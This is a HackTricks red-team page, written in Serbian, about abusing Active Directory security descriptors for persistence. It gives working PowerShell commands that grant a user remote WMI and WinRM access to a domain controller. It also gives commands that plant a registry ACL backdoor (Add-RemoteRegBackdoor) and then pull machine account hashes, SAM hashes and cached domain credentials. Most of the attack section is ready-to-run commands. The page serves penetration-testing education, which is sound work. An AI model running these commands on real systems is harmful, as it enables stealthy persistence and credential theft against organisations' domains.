hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md
2024-02-10 13:11:20 +00:00

5.2 KiB
Raw Blame History

Bezbednosni deskriptori

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Bezbednosni deskriptori

Iz dokumentacije: Security Descriptor Definition Language (SDDL) definiše format koji se koristi za opisivanje bezbednosnog deskriptora. SDDL koristi ACE stringove za DACL i SACL: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

Bezbednosni deskriptori se koriste za čuvanje dozvola koje objekat ima nad drugim objektom. Ako možete samo napraviti malu promenu u bezbednosnom deskriptoru objekta, možete dobiti veoma interesantne privilegije nad tim objektom, bez potrebe da budete član privilegovanog grupe.

Ova tehnika upornosti se zasniva na sposobnosti da se osvoje sve potrebne privilegije nad određenim objektima, kako bi se obavio zadatak koji obično zahteva administratorske privilegije, ali bez potrebe da budete administrator.

Pristup WMI

Možete dati korisniku pristup za udaljeno izvršavanje WMI koristeći ovo:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

Pristup WinRM-u

Dodelite pristup winrm PS konzoli korisniku koristeći ovo:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

Udaljen pristup heševima

Pristupite registru i izvucite heševe kreirajući Reg bekdoor koristeći DAMP, tako da u bilo kom trenutku možete dobiti heš računara, SAM i bilo koje keširane AD akreditive na računaru. Dakle, vrlo je korisno dati ovlašćenje za ovo običnom korisniku protiv računara kontrolora domena:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

Pogledajte Silver Tickets da biste saznali kako možete koristiti heš računa računara kontrolora domena.

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: